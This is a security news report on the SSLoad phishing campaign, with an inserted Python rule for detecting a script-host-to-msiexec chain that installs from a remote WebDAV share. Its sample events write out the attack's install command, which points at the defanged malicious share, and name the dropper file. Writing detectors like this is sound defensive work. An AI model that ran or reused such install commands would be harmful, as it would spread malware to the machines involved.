Researchers Detail Multistage Attack Hijacking Systems with SSLoad

Cybersecurity researchers have discovered an ongoing attack campaign that’s leveraging phishing emails to deliver a malware called SSLoad.

The campaign, codenamed FROZEN#SHADOW by Securonix, also involves the deployment of Cobalt Strike and the ConnectWise ScreenConnect remote desktop software.

“SSLoad is designed to stealthily infiltrate systems, gather sensitive information and transmit its findings back to its operators,” security researchers Den Iuzvyk, Tim Peck, and Oleg Kolesnikov said in a report shared with The Hacker News.

Earlier this month, Palo Alto Networks uncovered at least two different methods by which SSLoad is distributed: one entails the use of website contact forms to embed booby-trapped URLs, and the other involves macro-enabled Microsoft Word documents.

The latter is also notable for the fact that the malware acts as a conduit for delivering Cobalt Strike, while the former has been used to deliver a different malware called Latrodectus, a likely successor to IcedID.

The obfuscated JavaScript file (“out_czlrh.js”), when launched and run using wscript.exe, retrieves an MSI installer file (“slack.msi”) by connecting to a network share located at “\\wireoneinternet[.]info@80\share\” and runs it using msiexec.exe.
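The chain described above (a script run by wscript.exe that hands msiexec.exe an installer fetched from a remote share over WebDAV, signalled by the `@80` in the UNC path) leaves a distinctive parent/child process pattern in endpoint telemetry. The following detection logic is an added example, not code from Securonix or the report; it assumes Sysmon-style process-creation fields (`ParentImage`, `Image`, `CommandLine`), and the sample events are constructed for illustration, reusing only the file and host names the article itself gives.

```python
import re

# Windows script hosts that should rarely be the direct parent of an installer run
SCRIPT_HOSTS = {"wscript.exe", "cscript.exe"}
INSTALLER = "msiexec.exe"

# Matches a UNC source path such as \\host\share\file.msi. An optional
# host@80 / host@SSL suffix is the WebDAV-over-HTTP(S) form used in the
# FROZEN#SHADOW chain; group 1 is the host, group 2 the WebDAV port marker.
UNC_RE = re.compile(r'\\\\([^\\\s"@]+)(?:@(80|ssl))?\\', re.IGNORECASE)

# Constructed sample process-creation events (Sysmon-style fields); not real telemetry.
SAMPLE_EVENTS = [
    {   # script host launching msiexec with a WebDAV share as the package source
        "ParentImage": r"C:\Windows\System32\wscript.exe",
        "ParentCommandLine": r'wscript.exe "C:\Users\alice\Downloads\out_czlrh.js"',
        "Image": r"C:\Windows\System32\msiexec.exe",
        "CommandLine": r'msiexec.exe /i "\\wireoneinternet[.]info@80\share\slack.msi" /qn',
    },
    {   # benign: user double-clicked a local installer from Explorer
        "ParentImage": r"C:\Windows\explorer.exe",
        "ParentCommandLine": r"explorer.exe",
        "Image": r"C:\Windows\System32\msiexec.exe",
        "CommandLine": r'msiexec.exe /i "C:\Users\alice\Downloads\7zip.msi"',
    },
    {   # script host installing from an ordinary SMB share (hypothetical admin script)
        "ParentImage": r"C:\Windows\System32\cscript.exe",
        "ParentCommandLine": r"cscript.exe //nologo C:\ops\inventory.vbs",
        "Image": r"C:\Windows\System32\msiexec.exe",
        "CommandLine": r"msiexec.exe /i \\fileserver01\deploy\agent.msi /qn",
    },
]


def basename(path):
    """Return the lower-cased file name of a Windows path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def classify(event):
    """Return an alert dict for a script-host -> msiexec -> remote-source event, else None.

    Severity is 'high' when the source is a WebDAV path (host@80 / host@SSL),
    the form seen in the SSLoad chain, and 'medium' for any other UNC source,
    which is plausible in managed deployments and should be baselined.
    """
    parent = basename(event.get("ParentImage", ""))
    child = basename(event.get("Image", ""))
    cmd = event.get("CommandLine", "")
    if parent not in SCRIPT_HOSTS or child != INSTALLER:
        return None
    match = UNC_RE.search(cmd)
    if not match:
        return None  # local package: outside the scope of this rule
    host, webdav_port = match.group(1), match.group(2)
    return {
        "severity": "high" if webdav_port else "medium",
        "parent": parent,
        "remote_host": host,
        "webdav": bool(webdav_port),
        "command_line": cmd,
    }


def scan(events):
    """Run classify() over an iterable of events and return the alerts in order."""
    return [hit for hit in (classify(e) for e in events) if hit]


if __name__ == "__main__":
    for hit in scan(SAMPLE_EVENTS):
        print(f"[{hit['severity']}] {hit['parent']} -> msiexec.exe from \\\\{hit['remote_host']}")
```

The rule keys on process lineage plus the package source rather than on the file names, so renaming `out_czlrh.js` or `slack.msi` does not evade it; the WebDAV marker is what separates the high-confidence case from routine scripted installs off an internal SMB share.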

The disclosure comes as the AhnLab Security Intelligence Center (ASEC) revealed that Linux systems are being infected with an open-source remote access trojan called Pupy RAT.